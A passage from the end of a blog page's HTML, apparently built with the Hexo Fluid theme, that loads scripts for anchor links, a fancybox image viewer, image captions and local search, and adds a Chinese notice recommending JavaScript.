          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
